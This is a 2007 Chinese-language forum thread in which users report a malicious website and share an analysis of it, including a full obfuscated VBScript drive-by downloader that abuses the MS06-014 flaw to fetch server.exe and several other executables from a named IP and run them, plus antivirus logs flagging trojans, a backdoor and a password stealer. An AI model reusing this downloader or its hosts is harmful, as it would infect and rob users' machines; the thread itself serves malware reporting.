转一个毒网

观弈书童

ht tp://by186.com/

jlennon

NOTIHNG

绅博周幸

楼上的错了，看图

观弈书童

转一个分析报告

<SCRIPT language=VBScript>
on error resume next
fuckie = "http://210.51.184.238:8080/images/server.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"  
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, fuckie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)  
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>
<script language="javascript" src="http://count20.51yes.com/click.aspx?id=208338993&logo=12"></script>




##### Configuration
# Heuristic level : 4
# Archives scanning with no limit
# Embedded files scanning enabled
# Dialers detection enabled
# Spyware detection enabled
#
##### Statistic
# Objects scanned :
# f:\server.exe
# Files scanned : 1
# Archives scanned : 0   Files in archives : 0
# Embedded files scanned : 0
# Number of infected files : 1   Infected files left : 1
# Cleaned : 0
# Renamed : 0
# Deleted : 0
# Quarantined : 0
# Scanning time : 00:00:08
#
##### Notice
#
2;1;0;1;2007-03-24 16:04:23;Warning;ArcaScan;;102;f:\server.exe;Downloader.Small.Die;NO ACTION;;;

/src = "http://210.51.184.238:8080/images/1.exe"
/src = "http://210.51.184.238:8080/images/2.exe"
/src = "http://210.51.184.238:8080/images/3.exe"
/src = "http://210.51.184.238:8080/images/4.exe"


f:\3.exe
Znaleziono:
Trojan.Psw.Qqrob.Km

绅博周幸

原帖由 观弈书童 于 2007-3-24 16:18 发表
转一个分析报告

<SCRIPT language=VBScript>
on error resume next
fuckie = "http://210.51.184.238:8080/images/server.exe"
fname1="svchost.exe"
fname2="svchos ...

NOD32正好截杀那个网页木马，后面那些下载下来的就东西就没办法下了

mofunzone

上面那片东西雨伞挂一个，已上报
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\TDDOWNLOAD.rar'
C:\Documents and Settings\morgan\My Documents\
  TDDOWNLOAD.rar
    [0] Archive type: RAR
    --> server.exe
        [DETECTION] Is the Trojan horse TR/Dldr.Small.die.39
        [WARNING]   Infected files in archives cannot be repaired!
    --> 1.exe
    --> 2.exe
        [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
        [WARNING]   Infected files in archives cannot be repaired!
    --> 3.exe
        [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> 4.exe
        [DETECTION] Is the Trojan horse TR/Dldr.Suspect.CJ
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!

黑衣~魂

毒網咖啡一共偵測到兩次~!!
McAfee 已自動封鎖並移除 特洛伊病毒。

詳細資料
偵測: Exploit-MS06-014 (特洛伊病毒)
檔案路徑: C:\Documents and Settings\all.HOME\index[8].htm

詳細資料
偵測: Exploit-MS06-014 (病毒)

掛的程式抓下來測試回報嚕~!!

马力

驱逐舰三个

gggh

卡巴报.....

flykiss

没毒啊？是一个论团~~